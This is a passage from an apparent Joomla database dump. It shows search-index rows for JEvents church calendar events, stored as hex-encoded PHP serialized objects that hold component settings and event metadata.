746578745f6c656e677468223b733a323a223230223b733a31323a22636f6d5f7273735f6c6f676f223b733a303a22223b733a393a22636f6d5f6361636865223b733a313a2230223b733a363a226e6577736566223b733a313a2231223b733a31353a22636f6d5f626c6f636b526f626f7473223b733a313a2231223b733a31303a22726f626f747072696f72223b733a383a222d31206d6f6e7468223b733a393a22726f626f74706f7374223b733a383a222b31206d6f6e7468223b733a31343a227265646972656374726f626f7473223b733a313a2230223b733a31333a22726f626f746d656e756974656d223b733a303a22223b733a383a22626c6f636b616c6c223b733a313a2230223b733a31373a226c61726765446174615365744c696d6974223b733a363a22313030303030223b733a32303a226d6f6463616c5f446973704c6173744d6f6e7468223b733a323a224e4f223b733a32343a226d6f6463616c5f446973704c6173744d6f6e746844617973223b733a313a2230223b733a32303a226d6f6463616c5f446973704e6578744d6f6e7468223b733a323a224e4f223b733a32343a226d6f6463616c5f446973704e6578744d6f6e746844617973223b733a313a2230223b733a31393a226d6f6463616c5f4c696e6b436c6f616b696e67223b733a313a2230223b733a31393a226d6f646c61746573745f4d61784576656e7473223b733a323a223130223b733a31343a226d6f646c61746573745f4d6f6465223b733a313a2230223b733a31343a226d6f646c61746573745f44617973223b733a313a2235223b733a383a2273746172746e6f77223b733a313a2230223b733a31383a226d6f646c61746573745f4e6f526570656174223b733a313a2231223b733a31383a226d6f646c61746573745f4469737059656172223b733a313a2230223b733a31383a226d6f646c61746573745f6d756c7469646179223b733a313a2230223b733a31393a226d6f646c61746573745f446973704c696e6b73223b733a313a2231223b733a32323a226d6f646c61746573745f446973446174655374796c65223b733a313a2230223b733a32333a226d6f646c61746573745f4469735469746c655374796c65223b733a313a2230223b733a31393a226d6f646c61746573745f4c696e6b546f43616c223b733a313a2230223b733a32313a226d6f646c61746573745f536f727452657665727365223b733a313a2230223b733a32323a226d6f646c61746573745f4c696e6b436c6f616b696e67223b733a313a2230223b733a32303a226d6f646c61746573745f43757374466d74537472223b733a34393a22247b6576656e74446174657d5b21613a202d20247b656e64446174652825493a254d2570297d5d0d0a247b7469746c657d223b733a31333a226d6f646c61746573745f525353223b733a313a2230223b733a32343a226d6f646c61746573745f636f6e74656e74706c7567696e73223b733a313a2230223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a303a7b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a343a2270617468223b733a33373a22636f6d706f6e656e742f6a6576656e74732f6576656e742f31302f2d3f4974656d69643d30223b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a333a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a323a7b733a343a2254797065223b613a313a7b733a353a224576656e74223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224576656e74223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a2243617465676f7279223b613a313a7b733a343a224c4f4943223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a343a224c4f4943223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a36373a22696e6465782e7068703f6f7074696f6e3d636f6d5f6a6576656e7473267461736b3d6963616c6576656e742e64657461696c26657669643d3130264974656d69643d30223b733a353a22726f757465223b733a36373a22696e6465782e7068703f6f7074696f6e3d636f6d5f6a6576656e7473267461736b3d6963616c6576656e742e64657461696c26657669643d3130264974656d69643d30223b733a353a227469746c65223b733a34363a225370656369616c20416e6e6976657273617279205765656b656e6420262044616464792773204269727468646179223b733a31313a226465736372697074696f6e223b733a34383a22205370656369616c20416e6e6976657273617279205765656b656e642026204461646479277320426972746864617920223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b733a313a2231223b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30312d30312031313a32303a3137223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22323039392d31322d33312030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a313b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d),
(49, 'index.php?option=com_jevents&task=icalevent.detail&evid=11&Itemid=0', 'index.php?option=com_jevents&task=icalevent.detail&evid=11&Itemid=0', 'School of the Calling', '', '2017-01-01 10:21:32', '4abb7bdaa33ead99f43d1c7a1b3cce0e', 1, 1, 1, '*', '2017-01-01 11:21:32', '2099-12-31 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 0, 1, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a31373a7b733a383a2265766465745f6964223b733a323a223131223b733a373a2273756d6d617279223b733a303a22223b733a343a22626f6479223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30312d30312031313a32313a3332223b733a353a2272705f6964223b733a323a223330223b733a373a226576656e746964223b733a323a223131223b733a353a226361746964223b733a323a223338223b733a353a226963736964223b733a313a2231223b733a31303a22637265617465645f6279223b733a333a22313936223b733a383a2263617465676f7279223b733a343a224c4f4943223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a363a22617574686f72223b733a31303a2253757065722055736572223b733a363a226c61796f7574223b733a353a226576656e74223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3132343a7b733a31343a22636f6d5f646966666963756c7479223b733a313a2233223b733a383a22636c7562636f6465223b733a303a22223b733a31353a22636f6d5f63616c566965774e616d65223b733a373a2267657261696e74223b733a31323a226461726b74656d706c617465223b733a313a2230223b733a31343a22636f6d5f64617465666f726d6174223b733a313a2230223b733a31353a22636f6d5f63616c486561646c696e65223b733a343a226e6f6e65223b733a31363a22636f6d5f63616c55736549636f6e6963223b733a313a2231223b733a31313a2269636f6e73746f73686f77223b613a363a7b693a303b733a363a22627979656172223b693a313b733a373a2262796d6f6e7468223b693a323b733a363a2262797765656b223b693a333b733a353a226279646179223b693a343b733a353a226279636174223b693a353b733a363a22736561726368223b7d733a31353a22636f6d5f6e6176626172636f6c6f72223b733a353a22677265656e223b733a31363a22636f6d5f6561726c6965737479656172223b733a343a2232303130223b733a31343a22636f6d5f6c617465737479656172223b733a343a2232303137223b733a31313a22636f6d5f73746172646179223b733a313a2230223b733a31393a22636f6d5f7072696e745f69636f6e5f76696577223b733a313a2230223b733a31393a22636f6d5f656d61696c5f69636f6e5f76696577223b733a313a2230223b733a393a226669786a7175657279223b733a313a2231223b733a31333a2273686f7750616e656c4e657773223b733a313a2230223b733a31303a226d657267656d656e7573223b733a313a2230223b733a31353a2273686f775f61646d696e70616e656c223b733a313a2231223b733a31363a226963616c74696d657a6f6e656c697665223b733a31333a224575726f70652f4d6164726964223b733a31313a227265676578736561726368223b733a313a2231223b733a31323a22636174736570617261746f72223b733a313a227c223b733a383a226a657661646d696e223b733a323a223432223b733a31343a22617574686f72697365646f6e6c79223b733a313a2230223b733a31333a226a65767075626c6973686f776e223b733a313a2230223b733a353a2272756c6573223b4f3a383a22737464436c617373223a373a7b733a31313a22636f72652e6d616e616765223b4f3a383a22737464436c617373223a383a7b733a313a2231223b733a303a22223b733a313a2236223b733a303a22223b733a313a2237223b733a303a22223b733a313a2232223b733a303a22223b733a313a2233223b733a303a22223b733a313a2234223b733a303a22223b733a313a2235223b733a303a22223b733a313a2238223b733a303a22223b7d733a31313a22636f72652e637265617465223b4f3a383a22737464436c617373223a383a7b733a313a2231223b733a303a22223b733a313a2236223b733a303a22223b733a313a2237223b733a303a22223b733a313a2232223b733a303a22223b733a313a2233223b733a303a22223b733a313a2234223b733a303a22223b733a313a2235223b733a303a22223b733a313a2238223b733a303a22223b7d733a31333a22636f72652e656469742e6f776e223b4f3a383a22737464436c617373223a383a7b733a313a2231223b733a303a22223b733a313a2236223b733a303a22223b733a313a2237223b733a303a22223b733a313a2232223b733a303a22223b733a313a2233223b733a303a22223b733a313a2234223b733a303a22223b733a313a2235223b733a303a22223b733a313a2238223b733a303a22223b7d733a393a22636f72652e65646974223b4f3a383a22737464436c617373223a383a7b733a313a2231223b733a303a22223b733a313a2236223b733a303a22223b733a313a2237223b733a303a22223b733a313a2232223b733a303a22223b733a313a2233223b733a303a22223b733a313a2234223b733a303a22223b733a313a2235223b733a303a22223b733a313a2238223b733a303a22223b7d733a31353a22636f72652e656469742e7374617465223b4f3a383a22737464436c617373223a383a7b733a313a2231223b733a303a22223b733a313a2236223b733a303a22223b733a313a2237223b733a303a22223b733a313a2232223b733a303a22223b733a313a2233223b733a303a22223b733a313a2234223b733a303a22223b733a313a2235223b733a303a22223b733a313a2238223b733a303a22223b7d733a31343a22636f72652e64656c657465616c6c223b4f3a383a22737464436c617373223a383a7b733a313a2231223b733a303a22223b733a313a2236223b733a303a22223b733a313a2237223b733a303a22223b733a313a2232223b733a303a22223b733a313a2233223b733a303a22223b733a313a2234223b733a303a22223b733a313a2235223b733a303a22223b733a313a2238223b733a303a22223b7d733a31303a22636f72652e61646d696e223b4f3a383a22737464436c617373223a383a7b733a313a2231223b733a303a22223b733a313a2236223b733a303a22223b733a313a2237223b733a303a22223b733a313a2232223b733a303a22223b733a313a2233223b733a303a22223b733a313a2234223b733a303a22223b733a313a2235223b733a303a22223b733a313a2238223b733a303a22223b7d7d733a31373a22636f6d5f63616c55736553746454696d65223b733a313a2230223b733a31383a22636f6d5f6564697464617465666f726d6174223b733a353a22592d6d2d64223b733a31343a2264697361626c6572657065617473223b733a313a2230223b733a31303a2264656661756c74636174223b733a313a2230223b733a31383a22666f726365706f70757063616c656e646172223b733a313a2231223b733a32393a22636f6d5f63616c466f726365436174436f6c6f724576656e74466f726d223b733a313a2232223b733a393a2265646974706f707570223b733a313a2230223b733a363a22706f70757077223b733a333a22383030223b733a363a22706f70757068223b733a333a22353030223b733a32303a22636f6d5f73696e676c655f70616e655f65646974223b733a313a2230223b733a32313a2274696d656265666f72656465736372697074696f6e223b733a313a2230223b733a383a226d756c7469646179223b733a313a2231223b733a32333a22636f6d5f73686f775f656469746f725f627574746f6e73223b733a313a2230223b733a32383a22636f6d5f656469746f725f627574746f6e5f657863657074696f6e73223b733a31383a2270616765627265616b2c726561646d6f7265223b733a31343a22636f6d5f6e6f74696679626f7468223b733a313a2230223b733a31393a22636f6d5f6e6f74696679616c6c6576656e7473223b733a313a2230223b733a31363a22636f6d5f6e6f74696679617574686f72223b733a313a2230223b733a31323a2273686f777072696f72697479223b733a313a2230223b733a31323a22736b69707265666572726572223b733a313a2230223b733a31363a2264656661756c74737461727474696d65223b733a353a2230383a3030223b733a31343a2264656661756c74656e6474696d65223b733a353a2231373a3030223b733a31333a226d756c746963617465676f7279223b733a313a2230223b733a31323a22626f6f747374726170637373223b733a313a2230223b733a31353a22626f6f74737472617063686f73656e223b733a313a2231223b733a383a22616c6c6f77726177223b733a313a2230223b733a31333a226e6f746966796d657373616765223b733a3231303a223c703e5469746c65203a207b5449544c457d207b4445534352495054494f4e7d204576656e74207375626d69747465642066726f6d205b207b4c495645534954457d205d206279205b207b415554484f527d205d20566965772074686973206576656e74203a207b564945574c494e4b7d20456469742074686973206576656e74203a207b454449544c494e4b7d204d616e61676520796f7572206576656e7473203a203c6120687265663d227b4d414e4147454556454e54537d223e4d616e616765204576656e74733c2f613e3c2f703e223b733a31303a22636f6d5f627976696577223b733a313a2231223b733a31323a22636f6d5f6d61696c76696577223b733a313a2231223b733a31323a22636f6d5f6869747376696577223b733a313a2231223b733a31343a22636f6d5f72657065617476696577223b733a313a2231223b733a32303a22636f6e746163745f646973706c61795f6e616d65223b733a313a2230223b733a31353a2272656469726563745f64657461696c223b733a313a2230223b733a31373a2273686f776e61766261725f64657461696c223b733a313a2230223b733a31353a22636f6d5f63616c4375745469746c65223b733a323a223135223b733a31373a22636f6d5f63616c4d6178446973706c6179223b733a323a223135223b733a32333a22636f6d5f63616c446973706c6179537461727474696d65223b733a313a2231223b733a31373a22636f6d5f63616c53686f774c6567656e64223b733a313a2231223b733a31373a22636f6d5f656e61626c65546f6f6c546970223b733a313a2230223b733a31313a22746f6f6c74697074797065223b733a363a226a6f6f6d6c61223b733a31393a22636f6d5f63616c54544261636b67726f756e64223b733a313a2231223b733a31333a22636f6d5f63616c5454506f7358223b733a343a224c454654223b733a31333a22636f6d5f63616c5454506f7359223b733a353a2242454c4f57223b733a31353a22636f6d5f63616c5454536861646f77223b733a313a2230223b733a31363a22636f6d5f63616c5454536861646f7758223b733a313a2230223b733a31363a22636f6d5f63616c5454536861646f7759223b733a313a2230223b733a32333a22636f6d5f63616c4576656e744c697374526f7773507067223b733a323a223130223b733a31323a2273686f777965617270617374223b733a313a2231223b733a31353a22636f6d5f73686f7772657065617473223b733a313a2231223b733a31323a2273686f777965617264617465223b733a313a2230223b733a32303a22796561725f73686f775f6e6f65765f666f756e64223b733a313a2230223b733a31323a226963616c74696d657a6f6e65223b733a303a22223b733a373a226963616c6b6579223b733a31333a225345435245545f504852415345223b733a31323a2273686f776963616c69636f6e223b733a313a2230223b733a31373a2264697361626c656963616c6578706f7274223b733a313a2230223b733a31323a226963616c6d756c7469646179223b733a313a2230223b733a31353a226963616c6d756c7469646179323468223b733a313a2230223b733a383a226665696d706f7274223b733a313a2230223b733a393a22616c6c6f7765646974223b733a313a2230223b733a31333a226963616c666f726d6174746564223b733a313a2230223b733a31333a22636f6d5f7273735f6361636865223b733a313a2231223b733a31383a22636f6d5f7273735f63616368655f74696d65223b733a343a2233363030223b733a31333a22636f6d5f7273735f636f756e74223b733a313a2235223b733a32323a22636f6d5f7273735f6c6976655f626f6f6b6d61726b73223b733a313a2231223b733a31333a22636f6d5f7273735f6d6f646964223b733a313a2230223b733a31333a22636f6d5f7273735f7469746c65223b733a32373a224a4576656e747320525353204665656420666f72204a6f6f6d6c61223b733a31393a22636f6d5f7273735f6465736372697074696f6e223b733a31393a22506f7765726564206279204a4576656e747321223b733a31383a22636f6d5f7273735f6c696d69745f74657874223b733a313a2230223b733a31393a22636f6d5f7273735f746578745f6c656e677468223b733a323a223230223b733a31323a22636f6d5f7273735f6c6f676f223b733a303a22223b733a393a22636f6d5f6361636865223b733a313a2230223b733a363a226e6577736566223b733a313a2231223b733a31353a22636f6d5f626c6f636b526f626f7473223b733a313a2231223b733a31303a22726f626f747072696f72223b733a383a222d31206d6f6e7468223b733a393a22726f626f74706f7374223b733a383a222b31206d6f6e7468223b733a31343a227265646972656374726f626f7473223b733a313a2230223b733a31333a22726f626f746d656e756974656d223b733a303a22223b733a383a22626c6f636b616c6c223b733a313a2230223b733a31373a226c61726765446174615365744c696d6974223b733a363a22313030303030223b733a32303a226d6f6463616c5f446973704c6173744d6f6e7468223b733a323a224e4f223b733a32343a226d6f6463616c5f446973704c6173744d6f6e746844617973223b733a313a2230223b733a32303a226d6f6463616c5f446973704e6578744d6f6e7468223b733a323a224e4f223b733a32343a226d6f6463616c5f446973704e6578744d6f6e746844617973223b733a313a2230223b733a31393a226d6f6463616c5f4c696e6b436c6f616b696e67223b733a313a2230223b733a31393a226d6f646c61746573745f4d61784576656e7473223b733a323a223130223b733a31343a226d6f646c61746573745f4d6f6465223b733a313a2230223b733a31343a226d6f646c61746573745f44617973223b733a313a2235223b733a383a2273746172746e6f77223b733a313a2230223b733a31383a226d6f646c61746573745f4e6f526570656174223b733a313a2231223b733a31383a226d6f646c61746573745f4469737059656172223b733a313a2230223b733a31383a226d6f646c61746573745f6d756c7469646179223b733a313a2230223b733a31393a226d6f646c61746573745f446973704c696e6b73223b733a313a2231223b733a32323a226d6f646c61746573745f446973446174655374796c65223b733a313a2230223b733a32333a226d6f646c61746573745f4469735469746c655374796c65223b733a313a2230223b733a31393a226d6f646c61746573745f4c696e6b546f43616c223b733a313a2230223b733a32313a226d6f646c61746573745f536f727452657665727365223b733a313a2230223b733a32323a226d6f646c61746573745f4c696e6b436c6f616b696e67223b733a313a2230223b733a32303a226d6f646c61746573745f43757374466d74537472223b733a34393a22247b6576656e74446174657d5b21613a202d20247b656e64446174652825493a254d2570297d5d0d0a247b7469746c657d223b733a31333a226d6f646c61746573745f525353223b733a313a2230223b733a32343a226d6f646c61746573745f636f6e74656e74706c7567696e73223b733a313a2230223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a303a7b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a343a2270617468223b733a33373a22636f6d706f6e656e742f6a6576656e74732f6576656e742f31312f2d3f4974656d69643d30223b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a333a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a323a7b733a343a2254797065223b613a313a7b733a353a224576656e74223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224576656e74223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a2243617465676f7279223b613a313a7b733a343a224c4f4943223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a343a224c4f4943223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a36373a22696e6465782e7068703f6f7074696f6e3d636f6d5f6a6576656e7473267461736b3d6963616c6576656e742e64657461696c26657669643d3131264974656d69643d30223b733a353a22726f757465223b733a36373a22696e6465782e7068703f6f7074696f6e3d636f6d5f6a6576656e7473267461736b3d6963616c6576656e742e64657461696c26657669643d3131264974656d69643d30223b733a353a227469746c65223b733a32313a225363686f6f6c206f66207468652043616c6c696e67223b733a31313a226465736372697074696f6e223b733a303a22223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b733a313a2231223b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30312d30312031313a32313a3332223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22323039392d31322d33312030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a313b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d),
(50, 'index.php?option=com_jevents&task=icalevent.detail&evid=12&Itemid=0', 'index.php?option=com_jevents&task=icalevent.detail&evid=12&Itemid=0', 'Men\'s Convention', '', '2017-01-01 10:22:46', '075a8c8dcf1e81128042d7e530cde6f4', 1, 1, 1, '*', '2017-01-01 11:22:46', '2099-12-31 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 0, 1, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a31373a7b733a383a2265766465745f6964223b733a323a223132223b733a373a2273756d6d617279223b733a303a22223b733a343a22626f6479223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30312d30312031313a32323a3436223b733a353a2272705f6964223b733a323a223331223b733a373a226576656e746964223b733a323a223132223b733a353a226361746964223b733a323a223338223b733a353a226963736964223b733a313a2231223b733a31303a22637265617465645f6279223b733a333a22313936223b733a383a2263617465676f7279223b733a343a224c4f4943223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a363a22617574686f72223b733a31303a2253757065722055736572223b733a363a226c61796f7574223b733a353a226576656e74223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3132343a7b733a31343a22636f6d5f646966666963756c7479223b733a313a2233223b733a383a22636c7562636f6465223b733a303a22223b733a31353a22636f6d5f63616c566965774e616d65223b733a373a2267657261696e74223b733a31323a226461726b74656d706c617465223b733a313a2230223b733a31343a22636f6d5f64617465666f726d6174223b733a313a2230223b733a31353a22636f6d5f63616c486561646c696e65223b733a343a226e6f6e65223b733a31363a22636f6d5f63616c55736549636f6e6963223b733a313a2231223b733a31313a2269636f6e73746f73686f77223b613a363a7b693a303b733a363a22627979656172223b693a313b733a373a2262796d6f6e7468223b693a323b733a363a2262797765656b223b693a333b733a353a226279646179223b693a343b733a353a226279636174223b693a353b733a363a22736561726368223b7d733a31353a22636f6d5f6e6176626172636f6c6f72223b733a353a22677265656e223b733a31363a22636f6d5f6561726c6965737479656172223b733a343a2232303130223b733a31343a22636f6d5f6c617465737479656172223b733a343a2232303137223b733a31313a22636f6d5f73746172646179223b733a313a2230223b733a31393a22636f6d5f7072696e745f69636f6e5f76696577223b733a313a2230223b733a31393a22636f6d5f656d61696c5f69636f6e5f76696577223b733a313a2230223b733a393a226669786a7175657279223b733a313a2231223b733a31333a2273686f7750616e656c4e657773223b733a313a2230223b733a31303a226d657267656d656e7573223b733a313a2230223b733a31353a2273686f775f61646d696e70616e656c223b733a313a2231223b733a31363a226963616c74696d657a6f6e656c697665223b733a31333a224575726f70652f4d6164726964223b733a31313a227265676578736561726368223b733a313a2231223b733a31323a22636174736570617261746f72223b733a313a227c223b733a383a226a657661646d696e223b733a323a223432223b733a31343a22617574686f72697365646f6e6c79223b733a313a2230223b733a31333a226a65767075626c6973686f776e223b733a313a2230223b733a353a2272756c6573223b4f3a383a22737464436c617373223a373a7b733a31313a22636f72652e6d616e616765223b4f3a383a22737464436c617373223a383a7b733a313a2231223b733a303a22223b733a313a2236223b733a303a22223b733a313a2237223b733a303a22223b733a313a2232223b733a303a22223b733a313a2233223b733a303a22223b733a313a2234223b733a303a22223b733a313a2235223b733a303a22223b733a313a2238223b733a303a22223b7d733a31313a22636f72652e637265617465223b4f3a383a22737464436c617373223a383a7b733a313a2231223b733a303a22223b733a313a2236223b733a303a22223b733a313a2237223b733a303a22223b733a313a2232223b733a303a22223b733a313a2233223b733a303a22223b733a313a2234223b733a303a22223b733a313a2235223b733a303a22223b733a313a2238223b733a303a22223b7d733a31333a22636f72652e656469742e6f776e223b4f3a383a22737464436c617373223a383a7b733a313a2231223b733a303a22223b733a313a2236223b733a303a22223b733a313a2237223b733a303a22223b733a313a2232223b733a303a22223b733a313a2233223b733a303a22223b733a313a2234223b733a303a22223b733a313a2235223b733a303a22223b733a313a2238223b733a303a22223b7d733a393a22636f72652e65646974223b4f3a383a22737464436c617373223a383a7b733a313a2231223b733a303a22223b733a313a2236223b733a303a22223b733a313a2237223b733a303a22223b733a313a2232223b733a303a22223b733a313a2233223b733a303a22223b733a313a2234223b733a303a22223b733a313a2235223b733a303a22223b733a313a2238223b733a303a22223b7d733a31353a22636f72652e656469742e7374617465223b4f3a383a22737464436c617373223a383a7b733a313a2231223b733a303a22223b733a313a2236223b733a303a22223b733a313a2237223b733a303a22223b733a313a2232223b733a303a22223b733a313a2233223b733a303a22223b733a313a2234223b733a303a22223b733a313a2235223b733a303a22223b733a313a2238223b733a303a22223b7d733a31343a22636f72652e64656c657465616c6c223b4f3a383a22737464436c617373223a383a7b733a313a2231223b733a303a22223b733a313a2236223b733a303a22223b733a313a2237223b733a303a22223b733a313a2232223b733a303a22223b733a313a2233223b733a303a22223b733a313a2234223b733a303a22223b733a313a2235223b733a303a22223b733a313a2238223b733a303a22223b7d733a31303a22636f72652e61646d696e223b4f3a383a22737464436c617373223a383a7b733a313a2231223b733a303a22223b733a313a2236223b733a303a22223b733a313a2237223b733a303a22223b733a313a2232223b733a303a22223b733a313a2233223b733a303a22223b733a313a2234223b733a303a22223b733a313a2235223b733a303a22223b733a313a2238223b733a303a22223b7d7d733a31373a22636f6d5f63616c55736553746454696d65223b733a313a2230223b733a31383a22636f6d5f6564697464617465666f726d6174223b733a353a22592d6d2d64223b733a31343a2264697361626c6572657065617473223b733a313a2230223b733a31303a2264656661756c74636174223b733a313a2230223b733a31383a22666f726365706f70757063616c656e646172223b733a313a2231223b733a32393a22636f6d5f63616c466f726365436174436f6c6f724576656e74466f726d223b733a313a2232223b733a393a2265646974706f707570223b733a313a2230223b733a363a22706f70757077223b733a333a22383030223b733a363a22706f70757068223b733a333a22353030223b733a32303a22636f6d5f73696e676c655f70616e655f65646974223b733a313a2230223b733a32313a2274696d656265666f72656465736372697074696f6e223b733a313a2230223b733a383a226d756c7469646179223b733a313a2231223b733a32333a22636f6d5f73686f775f656469746f725f627574746f6e73223b733a313a2230223b733a32383a22636f6d5f656469746f725f627574746f6e5f657863657074696f6e73223b733a31383a2270616765627265616b2c726561646d6f7265223b733a31343a22636f6d5f6e6f74696679626f7468223b733a313a2230223b733a31393a22636f6d5f6e6f74696679616c6c6576656e7473223b733a313a2230223b733a31363a22636f6d5f6e6f74696679617574686f72223b733a313a2230223b733a31323a2273686f777072696f72697479223b733a313a2230223b733a31323a22736b69707265666572726572223b733a313a2230223b733a31363a2264656661756c74737461727474696d65223b733a353a2230383a3030223b733a31343a2264656661756c74656e6474696d65223b733a353a2231373a3030223b733a31333a226d756c746963617465676f7279223b733a313a2230223b733a31323a22626f6f747374726170637373223b733a313a2230223b733a31353a22626f6f74737472617063686f73656e223b733a313a2231223b733a383a22616c6c6f77726177223b733a313a2230223b733a31333a226e6f746966796d657373616765223b733a3231303a223c703e5469746c65203a207b5449544c457d207b4445534352495054494f4e7d204576656e74207375626d69747465642066726f6d205b207b4c495645534954457d205d206279205b207b415554484f527d205d20566965772074686973206576656e74203a207b564945574c494e4b7d20456469742074686973206576656e74203a207b454449544c494e4b7d204d616e61676520796f7572206576656e7473203a203c6120687265663d227b4d414e4147454556454e54537d223e4d616e616765204576656e74733c2f613e3c2f703e223b733a31303a22636f6d5f627976696577223b733a313a2231223b733a31323a22636f6d5f6d61696c76696577223b733a313a2231223b733a31323a22636f6d5f6869747376696577223b733a313a2231223b733a31343a22636f6d5f72657065617476696577223b733a313a2231223b733a32303a22636f6e746163745f646973706c61795f6e616d65223b733a313a2230223b733a31353a2272656469726563745f64657461696c223b733a313a2230223b733a31373a2273686f776e61766261725f64657461696c223b733a313a2230223b733a31353a22636f6d5f63616c4375745469746c65223b733a323a223135223b733a31373a22636f6d5f63616c4d6178446973706c6179223b733a323a223135223b733a32333a22636f6d5f63616c446973706c6179537461727474696d65223b733a313a2231223b733a31373a22636f6d5f63616c53686f774c6567656e64223b733a313a2231223b733a31373a22636f6d5f656e61626c65546f6f6c546970223b733a313a2230223b733a31313a22746f6f6c74697074797065223b733a363a226a6f6f6d6c61223b733a31393a22636f6d5f63616c54544261636b67726f756e64223b733a313a2231223b733a31333a22636f6d5f63616c5454506f7358223b733a343a224c454654223b733a31333a22636f6d5f63616c5454506f7359223b733a353a2242454c4f57223b733a31353a22636f6d5f63616c5454536861646f77223b733a313a2230223b733a31363a22636f6d5f63616c5454536861646f7758223b733a313a2230223b733a31363a22636f6d5f63616c5454536861646f7759223b733a313a2230223b733a32333a22636f6d5f63616c4576656e744c697374526f7773507067223b733a323a223130223b733a31323a2273686f777965617270617374223b733a313a2231223b733a31353a22636f6d5f73686f7772657065617473223b733a313a2231223b733a31323a2273686f777965617264617465223b733a313a2230223b733a32303a22796561725f73686f775f6e6f65765f666f756e64223b733a313a2230223b733a31323a226963616c74696d657a6f6e65223b733a303a22223b733a373a226963616c6b6579223b733a31333a225345435245545f504852415345223b733a31323a2273686f776963616c69636f6e223b733a313a2230223b733a31373a2264697361626c656963616c6578706f7274223b733a313a2230223b733a31323a226963616c6d756c7469646179223b733a313a2230223b733a31353a226963616c6d756c7469646179323468223b733a313a2230223b733a383a226665696d706f7274223b733a313a2230223b733a393a22616c6c6f7765646974223b733a313a2230223b733a31333a226963616c666f726d6174746564223b733a313a2230223b733a31333a22636f6d5f7273735f6361636865223b733a313a2231223b733a31383a22636f6d5f7273735f63616368655f74696d65223b733a343a2233363030223b733a31333a22636f6d5f7273735f636f756e74223b733a313a2235223b733a32323a22636f6d5f7273735f6c6976655f626f6f6b6d61726b73223b733a313a2231223b733a31333a22636f6d5f7273735f6d6f646964223b733a313a2230223b733a31333a22636f6d5f7273735f7469746c65223b733a32373a224a4576656e7473205253532046656